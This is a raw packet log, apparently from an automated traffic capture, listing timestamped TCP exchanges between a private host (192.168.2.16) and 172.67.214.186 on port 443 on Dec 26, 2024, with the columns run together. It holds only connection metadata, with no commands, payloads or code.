                                                                                                                                                                              Dec 26, 2024 18:26:45.011786938 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.018591881 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.018616915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.018647909 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.018655062 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.018696070 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.062676907 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.177182913 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.177206993 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.177263021 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.177269936 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.177316904 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.184724092 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.184745073 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.184787989 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.184793949 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.184822083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.184839010 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.192047119 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.192069054 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.192110062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.192116022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.192145109 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.192169905 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.199594975 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.199618101 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.199707031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.199712038 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.199755907 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.206525087 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.206543922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.206594944 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.206599951 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.206648111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.213022947 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.213043928 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.213094950 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.213099957 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.213145018 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.220520020 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.220540047 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.220582962 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.220588923 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.220619917 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.220633984 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.227925062 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.227945089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.227983952 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.227988958 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.228014946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.228037119 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.229558945 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.241731882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.388093948 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.388120890 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.388161898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.388171911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.388197899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.388217926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.395484924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.395504951 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.395541906 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.395546913 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.395569086 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.395593882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.403017998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.403039932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.403070927 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.403074980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.403098106 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.403122902 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.409454107 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.409473896 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.409527063 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.409532070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.409568071 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.411472082 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.417125940 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.417145967 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.417186975 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.417191982 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.417217970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.417241096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.418991089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.419042110 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.425518036 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.425539017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.425575972 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.425580025 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.425606966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.432687044 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.432713985 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.432751894 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.432756901 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.432785034 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.478686094 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.593492031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.593513012 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.593555927 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.593560934 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.593600035 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.600152969 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.600172997 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.600208044 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.600213051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.600239992 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.600266933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.607491970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.607512951 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.607553005 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.607558012 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.607592106 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.607604980 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.614877939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.614898920 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.614940882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.614945889 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.614969969 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.614979029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.621486902 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.621507883 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.621557951 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.621562958 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.621623039 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.629313946 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.629339933 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.629378080 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.629383087 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.629406929 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.629429102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.635862112 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.635881901 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.635921001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.635927916 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.635968924 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.635968924 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.643408060 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.643429041 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.643471956 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.643476963 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.643502951 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.643526077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.804079056 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.804100037 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.804140091 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.804146051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.804188967 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.812855959 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.812875032 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.812916040 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.812920094 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.812947035 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.812968969 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.820120096 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.820138931 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.820193052 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.820198059 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.820249081 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.827164888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.827184916 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.827235937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.827241898 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.827289104 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.834181070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.834225893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.834265947 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.834270954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.834309101 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.834321976 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.840728998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.840756893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.840787888 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.840791941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.840820074 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.840836048 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.847882986 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.847906113 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.847943068 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.847948074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.848010063 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.854651928 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.854675055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.854727030 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.854732990 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.854778051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.014487982 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.014511108 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.014552116 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.014560938 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.014591932 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.014609098 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.021377087 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.021405935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.021454096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.021460056 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.021492958 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.021513939 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.028772116 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.028791904 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.028856993 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.028862953 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.028912067 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.036236048 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.036257029 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.036294937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.036298990 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.036328077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.036348104 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.042754889 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.042787075 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.042828083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.042833090 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.042859077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.042880058 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.050741911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.050762892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.050811052 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.050817013 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.050849915 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.050870895 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.057282925 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.057302952 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.057336092 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.057343006 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.057369947 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.057390928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.060156107 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.065820932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.065841913 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.065887928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.065892935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.065918922 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.065937996 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.104435921 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.225142956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.225167036 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.225219965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.225225925 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.225281000 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.232673883 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.232695103 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.232747078 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.232750893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.232789993 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.232820034 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.239208937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.239228964 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.239281893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.239286900 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.239342928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.239342928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.246587038 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.246618986 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.246682882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.246689081 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.246725082 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.246745110 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.254218102 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.254236937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.254283905 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.254287958 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.254328966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.261159897 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.261179924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.261262894 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.261267900 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.261315107 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.268516064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.268536091 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.268615007 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.268620968 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.268683910 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.276228905 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.276251078 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.276297092 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.276303053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.276330948 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.276351929 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.435714960 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.435739040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.435817957 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.435832977 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.435883045 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.443017006 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.443063021 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.443124056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.443130016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.443172932 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.450480938 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.450500965 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.450561047 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.450565100 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.450611115 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.457034111 CET44349719172.67.214.186192.168.2.16
